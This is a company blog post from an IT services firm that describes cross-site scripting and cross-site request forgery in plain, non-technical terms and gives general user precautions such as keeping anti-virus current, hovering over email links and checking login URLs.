SandStorm IT

Power On

  • Services
    • Managed IT Services
    • Servers & Networks
    • Business Computers & Support
    • Cloud Services & Data Backup
    • Custom Software Development
    • VoIP Telephone Solutions
    • Custom Web Design
    • Disaster Recovery Solutions
    • Security & Compliance
    • IT Consulting
  • Technologies
  • Pricing
  • Work
  • About
    • Our History
    • Our Team
    • Careers
    • Press
  • Blog
  • Contact
    • (901) 475-0275
  • Help Me

Common Browser-based Network Attacks and How to Avoid Them

February 16, 2021 By Jordan B. Sanders

Day by day, we do more and more through our web browsers.  We perform daily work tasks like checking and sending email, visiting websites to learn about news in our chosen fields, and work in web-based operational systems all through our browsers, and outside of the office, we use those same browsers to check our bank account balances, purchase goods and services online, and even meet new friends.  This allows malicious actors the ability to cast an extremely wide net for would-be victims by creating an attack vector which utilizes the web browser.  Let’s take a look at a couple of possible attacks and investigate how one can mitigate or entirely avoid them.

 

Cross-Site Scripting

Cross-site scripting is one of the most prevalent types of browser-based network attacks.  This attack works by having a victim direct their browser to an exploitable website (likely one that they already trust) with some information encoded in the URL to cause the victim’s browser to download malicious code.  This malicious code is then executed on the victim’s system through the browser to send sensitive information from the victim’s browser to the attacker’s server for logging and use later.

 

Cross-Site Request Forgery

Cross-site request forgery is another widely-used method of attack.  In this type of attack, the malicious actor causes the victim’s browser to execute actions or make website requests without the victim’s consent or knowledge.  This attack usually happens when a user is logged into their account on a website which provides account-specific functionality.  Through cross-site request forgery, the attacker can effectively act like they are the logged-in user as long as they can convince the victim to click specially-crafted links to execute the unauthorized actions through the victim’s account.  The victim is often unaware that the links they are clicking are executing malicious actions because they have been injected by an attacker through an exploit in the website that the victim trusts.  This type of attack may simply be annoying (for example, the attacker could simply change the victim’s settings on the website), but they could also be very impactful if, say, a bank’s website was compromised as the attack may be able to initiate money transfers from the victim’s account into their own (this bank example actually happened in ING Direct’s online banking system).

 

General Precautions

Always be sure that you have the appropriate anti-virus and anti-malware software installed, up-to-date, and running on your computer.  This will help in the event that an initial attack is successful in that it can potentially stop the execution of malicious code once it arrives on your system.

 

In addition, a great guideline is to never click links in emails from individuals you do not know.  Emails are one of the largest entry points for exploits as it is so easy to just click a link in an email.  These links can contain information and send you to exploitable websites which will allow an attacker to harvest any information the exploit he is using can touch.

 

Along those same lines, be extra cautious when clicking any links in emails.  Even if the email is from someone you know, they could have had their email account compromised, or they may be sharing malicious links without them knowing.  If you expect a link to be to a certain website, hover over it and see if you can determine what the actual URL is.  For example, if a link you expect to be going to Yahoo has a URL like http://yhaoo.com/, do not click it as it is not yahoo.com.

 

Another precaution to take is to double-check the URL of sites before you login.  If you’re on a site that looks like Facebook, ensure that in your browser’s location bar that the URL is https://facebook.com and not something else.  If it isn’t, you are very likely at a site which is attempting to collect your Facebook credentials for their usage later.

 

If you have any questions about these types of attacks or would like more guidance on how to make your computer systems more secure, definitely call SandStorm IT at 901-475-0275.  We’ll listen to your concerns and offer our professional advice to protect your computing infrastructure.

Related Posts

  • What exactly are "Browser Cookies"?
  • What exactly are "Browser Cookies"?
  • Are you still on a workgroup network?
  • Phishing: How to Avoid Phishing Scams
  • 5 Reasons Why Your Business Needs an Awesome WiFi Network

Categories: Cybersecurity, Networking, Personal Computing, Software & Applications

Subscribe to Our Newsletter

Check your inbox or spam folder now to confirm your subscription.

SANDSTORM IT BLOG

Featured
News
Press Releases
SandStorm News
Security Alerts & Vulnerabilities
Managed Services
Managed Anti-Virus/Anti-Malware
Managed Backups & Monitoring
Updates/Patches
Passwords
Cybersecurity
Spyware/Malware/Viruses
Social Engineering/Phishing
Ransomware
Data Breaches/Leaks
Other
Servers
Server & Server Hardware
Cloud/Serverless Computing
Server Operating Systems
Networking
Wired Networking
Wireless/Wi-Fi
Internet of Things (IoT)
5G & Mobile Networking
Business
General Business
Enterprise Resource Planning (ERP)
Voice & Telephony
Backups & Business Continuity
On-Site Backups
Cloud Backups
DR/BCM Planning & Consulting
Personal Computing
Tips/Tricks/Shortcuts
Troubleshooting
Hardware & Peripherals
Desktop Operating Systems
Software & Applications
Office Applications
Desktop Software
Email Software and Applications

Authors

Authors
Doyle Sanders
Jake Sanders
Jordan Sanders
Justin Oliver
Matt Ballard
Robert Cleveland
Cristian Colón
Jacob Ellis
Jeff Fowler
Miker Irick
Curtis Mayo
Josh Restuccio
Lindsey Sanders
Matthew Stafford
Josh Yarbrough

Give Us a Call

(901) 475-0275
61 Atoka-McLaughlin Dr.
Atoka, TN 38004

About SandStorm IT

SandStorm IT is a team of committed professionals who are dedicated and excited to solve your technology needs.  We accomplish this through understanding your business and then applying the appropriate technology solutions to meet the needs.

Our breadth of experience with information technology covers a range of diverse skill sets such as server setup and configuration, network and firewall solutions, VoIP telephone systems, web and database hosting, custom web application programming, mobile development, and IT security practices and policies.

SandStorm IT has the desire, expertise, and commitment to bring your vision to life.

  • Services
  • Technologies
  • Pricing
  • Work
  • About
  • Blog
  • Contact
  • Help Me
Authorized Solution Provider